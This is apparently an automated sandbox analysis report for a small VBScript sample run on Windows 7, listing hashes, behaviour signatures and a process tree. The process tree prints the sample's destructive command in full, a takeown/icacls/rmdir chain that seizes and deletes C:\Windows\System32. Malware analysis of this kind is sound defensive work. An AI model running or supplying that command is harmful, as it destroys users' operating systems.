Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
25-05-2024 16:19
Static task
static1
Behavioral task
behavioral1
Sample
target.vbs
Resource
win7-20240419-en
General
-
Target
target.vbs
-
Size
209B
-
MD5
fe505a5e05c25e1b991d6f6094899bdf
-
SHA1
3dda3dbed85f227a9563b8b7e94b1fbfc9ec5d99
-
SHA256
dc83fb002acfc2179b1e82046f5827f14a5ed2bd58503403155b0cef21f89533
-
SHA512
c7c39c1ddcb6c4a83489b14c459f0446bd1585bf4d840e7026a08b4341584ee48381b23a182f3f7fc74c04568a6428b00ffadab5954dbd6e3f2967b805c5340f
Malware Config
Signatures
-
Manipulates Digital Signatures 1 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\wintrust.dll cmd.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 2824 takeown.exe 2516 icacls.exe -
Loads dropped DLL 7 IoCs
Processes:
WMIADAP.EXEpid process 2536 WMIADAP.EXE 2536 WMIADAP.EXE 2536 WMIADAP.EXE 2536 WMIADAP.EXE 1196 1196 1196 -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 2824 takeown.exe 2516 icacls.exe -
Drops file in System32 directory 64 IoCs
Processes:
cmd.exedescription ioc process File opened for modification C:\Windows\System32\comdlg32.dll cmd.exe File opened for modification C:\Windows\System32\FXSAPI.dll cmd.exe File opened for modification C:\Windows\System32\mfplat.dll cmd.exe File opened for modification C:\Windows\System32\shlwapi.dll cmd.exe File opened for modification C:\Windows\System32\imagehlp.dll cmd.exe File opened for modification C:\Windows\System32\sxs.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MICROS~1.EVT cmd.exe File opened for modification C:\Windows\System32\cscapi.dll cmd.exe File opened for modification C:\Windows\System32\normaliz.dll cmd.exe File opened for modification C:\Windows\System32\wbem\wbemprox.dll cmd.exe File opened for modification C:\Windows\System32\usp10.dll cmd.exe File opened for modification C:\Windows\System32\api-ms-win-downlevel-advapi32-l2-1-0.dll cmd.exe File opened for modification C:\Windows\System32\FWPUCLNT.DLL cmd.exe File opened for modification C:\Windows\System32\syncui.dll cmd.exe File opened for modification C:\Windows\System32\usbmon.dll cmd.exe File opened for modification C:\Windows\System32\webservices.dll cmd.exe File opened for modification C:\Windows\System32\api-ms-win-downlevel-advapi32-l1-1-0.dll cmd.exe File opened for modification C:\Windows\System32\cfgmgr32.dll cmd.exe File opened for modification C:\Windows\System32\C_949.NLS cmd.exe File opened for modification C:\Windows\System32\en-US\bthprops.cpl.mui cmd.exe File opened for modification C:\Windows\System32\gdi32.dll cmd.exe File opened for modification C:\Windows\System32\7B296F~2.C74 cmd.exe File opened for modification C:\Windows\System32\config\SECURI~2.LOG cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MICROS~4.EVT cmd.exe File opened for modification C:\Windows\System32\wininit.exe cmd.exe File opened for modification C:\Windows\System32\fveapi.dll cmd.exe File opened for modification C:\Windows\System32\netapi32.dll cmd.exe File opened for modification C:\Windows\System32\tbs.dll cmd.exe File opened for modification C:\Windows\System32\inetpp.dll cmd.exe File opened for modification C:\Windows\System32\nsi.dll cmd.exe File opened for modification C:\Windows\System32\wbem\NCProv.dll cmd.exe File opened for modification C:\Windows\System32\bitsperf.dll cmd.exe File opened for modification C:\Windows\System32\config\TxR\{01688~2.REG cmd.exe File opened for modification C:\Windows\System32\gameux.dll cmd.exe File opened for modification C:\Windows\System32\framedynos.dll cmd.exe File opened for modification C:\Windows\System32\netutils.dll cmd.exe File opened for modification C:\Windows\System32\sfc_os.dll cmd.exe File opened for modification C:\Windows\System32\Syncreg.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI7771~1.EVT cmd.exe File opened for modification C:\Windows\System32\batmeter.dll cmd.exe File opened for modification C:\Windows\System32\snmpapi.dll cmd.exe File opened for modification C:\Windows\System32\TSpkg.dll cmd.exe File opened for modification C:\Windows\System32\esent.dll cmd.exe File opened for modification C:\Windows\System32\netman.dll cmd.exe File opened for modification C:\Windows\System32\imapi2.dll cmd.exe File opened for modification C:\Windows\System32\wbem\repdrvfs.dll cmd.exe File opened for modification C:\Windows\System32\WindowsCodecs.dll cmd.exe File opened for modification C:\Windows\System32\ubpm.dll cmd.exe File opened for modification C:\Windows\System32\config\RegBack\SAM cmd.exe File opened for modification C:\Windows\System32\msxml6r.dll cmd.exe File opened for modification C:\Windows\System32\netjoin.dll cmd.exe File opened for modification C:\Windows\System32\psapi.dll cmd.exe File opened for modification C:\Windows\System32\xmllite.dll cmd.exe File opened for modification C:\Windows\System32\oleacc.dll cmd.exe File opened for modification C:\Windows\System32\pcwum.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MIA934~1.EVT cmd.exe File opened for modification C:\Windows\System32\mprapi.dll cmd.exe File opened for modification C:\Windows\System32\winevt\Logs\MI03A7~1.EVT cmd.exe File opened for modification C:\Windows\System32\BFE.DLL cmd.exe File opened for modification C:\Windows\System32\bitsigd.dll cmd.exe File opened for modification C:\Windows\System32\thumbcache.dll cmd.exe File opened for modification C:\Windows\System32\secur32.dll cmd.exe File opened for modification C:\Windows\System32\UIAnimation.dll cmd.exe File opened for modification C:\Windows\System32\api-ms-win-downlevel-version-l1-1-0.dll cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 2824 takeown.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
WScript.execmd.exedescription pid process target process PID 1320 wrote to memory of 2412 1320 WScript.exe cmd.exe PID 1320 wrote to memory of 2412 1320 WScript.exe cmd.exe PID 1320 wrote to memory of 2412 1320 WScript.exe cmd.exe PID 2412 wrote to memory of 2824 2412 cmd.exe takeown.exe PID 2412 wrote to memory of 2824 2412 cmd.exe takeown.exe PID 2412 wrote to memory of 2824 2412 cmd.exe takeown.exe PID 2412 wrote to memory of 2516 2412 cmd.exe icacls.exe PID 2412 wrote to memory of 2516 2412 cmd.exe icacls.exe PID 2412 wrote to memory of 2516 2412 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System322⤵
- Manipulates Digital Signatures
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32 /r /d y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant administrators:F /t3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T1⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
\Windows\System32\advapi32.dllFilesize
856KB
MD56df46d2bd74e3da1b45f08f10d172732
SHA13491f8f9a73c00b158e43a530210d67a4f0598ae
SHA2562dc945f6f2c4a82189bc7da2fcbb7d9a0e2588a909539249e55ba82468e0c677
SHA512648d07a7bec83f45629d34defde0421f449998f3a290cca2ff3941ef2f551ce508c204cb2e0ba02c6b79dfcf7a7c2f2ac3056f286ca63d31e033db7c524f9abb
-
\Windows\System32\clbcatq.dllFilesize
593KB
MD525983de69b57142039ac8d95e71cd9c9
SHA101691e3b0bfa569e64bdb7dc3d637a867ed2dc08
SHA256a677da7ebcbcb6073d27e8a38809f51e971e83ed379bc599aaad6ef4216348da
SHA512dfd22fb0570e3c1caf908305f04aec9c7cbe8332f6d6409b8c724baca523354c93bc240bf6d7944c892a4fc221c099d5fbf0b9526a9d9bb7c13ba367e876afec
-
\Windows\System32\cryptbase.dllFilesize
43KB
MD5784fa3df338e2e8f5f0389d6fac428af
SHA16d32c67c91c6d374854e907c6719db2538540867
SHA2569c8aa0cfdeb9e38aaf8eb08626070e0f0364f4f8a793cfe3532ec6c007980c34
SHA512a147e689c6fcca7bab690aec17deef74d6935338cd159bcb10acc2ad76841e6abbd9290ac17e2f5b5ec3422823a1e716e7cd5c5a1b950937c5295e14b68ac53c
-
\Windows\System32\cryptsp.dllFilesize
78KB
MD5d0c2fbb6d97416b0166478fc7ae2b212
SHA1e290bdf2312ac30a4e9f2a96d7c84714eee84899
SHA2567eab6c37f0a845e645ca44cc060ac6c56e386c7ef7a64716c6786c9602ad8c9d
SHA512ee3cc1a1b21a0ee16532dfc0713f1b369414f521937e44851ba338eaf188109779b9b615ce37bf4cff572a9484d99d9a36184b9120cf4990fc2d2791ed680e87
-
\Windows\System32\imageres.dllFilesize
19.3MB
MD55aa945234e9d4cce4f715276b9aa712c
SHA1dba3c8cecb3f8d4b1d96265d8519dbe0e911f446
SHA25665165bd131056816f009d987fc78ac86ffe0c3c38a27e73f873586b7ff4d59cf
SHA512acf0d5706662b3f4abb68b94aad9155c17dc74ccf3a92ed97c9bc2abdf4f8fd32705bb7692836452304301605561121b4ef2b82b81563f9bf2a9d1c71e8c6233
-
\Windows\System32\wscript.exeFilesize
165KB
MD58886e0697b0a93c521f99099ef643450
SHA1851bd390bf559e702b8323062dbeb251d9f2f6f7
SHA256d73f7ee4e6e992a618d02580bdbf4fd6ba7c683d110928001092f4073341e95f
SHA512fc4a176f49a69c5600c427af72d3d274cfeacef48612b18cda966c3b4dda0b9d59c0fe8114d5ed8e0fec780744346e2cd503d1fd15c0c908908d067214b9d837